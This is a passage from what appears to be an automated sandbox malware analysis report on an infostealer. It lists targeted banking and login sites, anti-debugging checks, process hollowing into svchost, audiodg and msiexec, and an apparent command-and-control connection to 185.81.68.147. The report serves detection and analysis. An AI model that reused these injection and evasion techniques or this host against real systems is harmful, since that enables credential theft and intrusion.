                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696428655t
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696428655u
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696428655|UE
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696428655}
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696428655t
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696428655x
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696428655x
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696428655f
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696428655s
                  Source: explorer.exe, 00000007.00000003.3101098577.0000000009C21000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696428655o
                  Source: explorer.exe, 00000007.00000003.2355314746.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware-42 27 d9 2e dc 89 72 dX
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696428655j
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696428655
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: explorer.exe, 00000007.00000003.2355314746.0000000003553000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: VMware,p
                  Source: explorer.exe, 00000007.00000003.3098330596.0000000009C92000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000C5E500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{a33c735c-61ca-11ee-8c18-806e6f6e6963}#0000000007500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0#{5-
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.0000000004616000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696428655h
                  Source: explorer.exe, 00000007.00000000.2049075653.0000000000F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
                  Source: DB9C.tmp.ssg.exe, 0000000A.00000002.2458757068.00000000045E2000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696428655x
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeAPI call chain: ExitProcess graph end nodegraph_1-927
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeAPI call chain: ExitProcess graph end nodegraph_1-932
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeAPI call chain: ExitProcess graph end nodegraph_1-929
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeAPI call chain: ExitProcess graph end nodegraph_1-949
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-879
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-895
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-885
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-884
                  Source: C:\Windows\System32\svchost.exeAPI call chain: ExitProcess graph end nodegraph_6-875
                  Source: C:\Windows\explorer.exeAPI call chain: ExitProcess graph end nodegraph_7-39576
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeAPI call chain: ExitProcess graph end nodegraph_11-927
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeAPI call chain: ExitProcess graph end nodegraph_11-931
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeAPI call chain: ExitProcess graph end nodegraph_11-929
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeAPI call chain: ExitProcess graph end nodegraph_11-950
                  Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\audiodg.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation

                  Anti Debugging

                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF79483321C IsDebuggerPresent,GetCurrentProcess,CheckRemoteDebuggerPresent,1_2_00007FF79483321C
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_11-1182
                  Source: C:\Windows\System32\audiodg.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
                  Source: C:\Windows\System32\svchost.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_6-1128
                  Source: C:\Windows\System32\msiexec.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleep
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeDebugger detection routine: IsDebuggerPresent or CheckRemoteDebuggerPresent, DecisionNodes, ExitProcess or Sleepgraph_1-1182
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\svchost.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\audiodg.exeProcess queried: DebugPort
                  Source: C:\Windows\System32\msiexec.exeProcess queried: DebugPort
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD64ED0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79CD64ED0
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8D7A24 EncodePointer,__crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,7_2_0E8D7A24
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B88B0 CreateToolhelp32Snapshot,Thread32First,GetCurrentProcessId,GetCurrentThreadId,HeapAlloc,HeapReAlloc,Thread32Next,CloseHandle,7_2_0E8B88B0
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD61220 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,SetFileAttributesW,SetFileAttributesW,CreateProcessW,CloseHandle,CloseHandle,CreateProcessW,CloseHandle,CloseHandle,0_2_00007FF79CD61220
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD699E4 GetProcessHeap,0_2_00007FF79CD699E4
                  Source: C:\Windows\System32\svchost.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD62168 SetUnhandledExceptionFilter,0_2_00007FF79CD62168
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD64ED0 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79CD64ED0
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD6224C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF79CD6224C
                  Source: C:\Users\user\Desktop\K6qneGSDSB.exeCode function: 0_2_00007FF79CD61F88 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF79CD61F88
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_00409950 SetUnhandledExceptionFilter,2_2_00409950
                  Source: C:\Users\user\Desktop\Grabber.exeCode function: 2_2_00409930 SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,SetUnhandledExceptionFilter,2_2_00409930
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8E0350 SetUnhandledExceptionFilter,7_2_0E8E0350
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F2BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,20_2_00007FF641F2BBC0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F2C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF641F2C44C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F39924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,20_2_00007FF641F39924
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 20_2_00007FF641F2C62C SetUnhandledExceptionFilter,20_2_00007FF641F2C62C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F2BBC0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF641F2BBC0
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F2C44C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF641F2C44C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F39924 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF641F39924
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF641F2C62C SetUnhandledExceptionFilter,21_2_00007FF641F2C62C
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B8370F20 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF8B8370F20
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8B834A184 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF8B834A184
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB65054 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF8BFB65054
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB64A34 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF8BFB64A34
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB76810 IsProcessorFeaturePresent,memset,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF8BFB76810
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB75DF8 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF8BFB75DF8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB769F8 SetUnhandledExceptionFilter,21_2_00007FF8BFB769F8
                  Source: C:\Users\user\AppData\Local\Temp\58B.tmp.zx.exeCode function: 21_2_00007FF8BFB9D414 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF8BFB9D414
                  Source: C:\Users\user\AppData\Local\Temp\DB9C.tmp.ssg.exeMemory allocated: page read and write | page guard

                  HIPS / PFW / Operating System Protection Evasion

                  Source: C:\Windows\explorer.exeFile created: 58B.tmp.zx.exe.7.dr
                  Source: C:\Windows\explorer.exeNetwork Connect: 185.81.68.147 80
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory allocated: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 protect: page execute and read and write
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794832048 GetModuleFileNameW,CreateProcessW,CreateFileW,GetFileSize,CloseHandle,VirtualAlloc,CloseHandle,ReadFile,VirtualFree,CloseHandle,CloseHandle,GetThreadContext,VirtualFree,ReadProcessMemory,GetModuleHandleA,GetProcAddress,NtUnmapViewOfSection,VirtualFree,VirtualAllocEx,VirtualFree,WriteProcessMemory,VirtualFree,WriteProcessMemory,VirtualFree,RtlCompareMemory,ReadProcessMemory,WriteProcessMemory,VirtualFree,WriteProcessMemory,SetThreadContext,VirtualFree,ResumeThread,VirtualFree,VirtualFree,1_2_00007FF794832048
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeCode function: 1_2_00007FF794832CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,1_2_00007FF794832CB8
                  Source: C:\Windows\System32\svchost.exeCode function: 6_2_00007FF7E52B2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,6_2_00007FF7E52B2CB8
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B4200 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,7_2_0E8B4200
                  Source: C:\Windows\explorer.exeCode function: 7_2_0E8B3100 OpenProcess,GetModuleHandleA,GetProcAddress,CloseHandle,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,CloseHandle,CloseHandle,VirtualFreeEx,CloseHandle,7_2_0E8B3100
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeCode function: 11_2_00007FF7DBD52CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,11_2_00007FF7DBD52CB8
                  Source: C:\Windows\System32\audiodg.exeCode function: 13_2_00007FF7A91B2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,13_2_00007FF7A91B2CB8
                  Source: C:\Windows\System32\msiexec.exeCode function: 14_2_00007FF775AE2CB8 VirtualAllocEx,WriteProcessMemory,VirtualProtectEx,CreateRemoteThread,14_2_00007FF775AE2CB8
                  Source: C:\Windows\System32\svchost.exeThread created: C:\Windows\explorer.exe EIP: 8B8AA10
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeNtUnmapViewOfSection: Indirect: 0x7FF7948323DC
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeNtUnmapViewOfSection: Indirect: 0x7FF7DBD523DC
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 value starts with: 4D5A
                  Source: C:\Windows\System32\svchost.exeMemory written: C:\Windows\explorer.exe base: 8B70000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\svchost.exe base: 7FF7E52B0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\msiexec.exe base: 7FF775AE0000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeMemory written: C:\Windows\System32\audiodg.exe base: 7FF7A91B0000 value starts with: 4D5A
                  Source: C:\Windows\System32\svchost.exeMemory written: PID: 1028 base: 8B70000 value: 4D
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeThread register set: target process: 3092
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeThread register set: target process: 5016
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeThread register set: target process: 6348
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 5484
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 4744
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 6480
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 4084
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 1084
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeThread register set: target process: 5260
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF775AE0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF775AE0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Users\user\Desktop\K6qneGSDSB.exe base address: 7FF7A91B0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\svchost.exe base address: 7FF7E52B0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\msiexec.exe base address: 7FF775AE0000
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeSection unmapped: C:\Windows\System32\audiodg.exe base address: 7FF7A91B0000
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\systemsx.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\Desktop\Grabber.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\B334.tmp\B335.tmp\B336.bat C:\Users\user\Desktop\Grabber.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\msiexec.exe "C:\Windows\system32\msiexec.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\system32\svchost.exe"
                  Source: C:\Users\user\AppData\Roaming\616766F8886C145454191\616766F8886C145454191.exeProcess created: C:\Windows\System32\audiodg.exe "C:\Windows\system32\audiodg.exe"
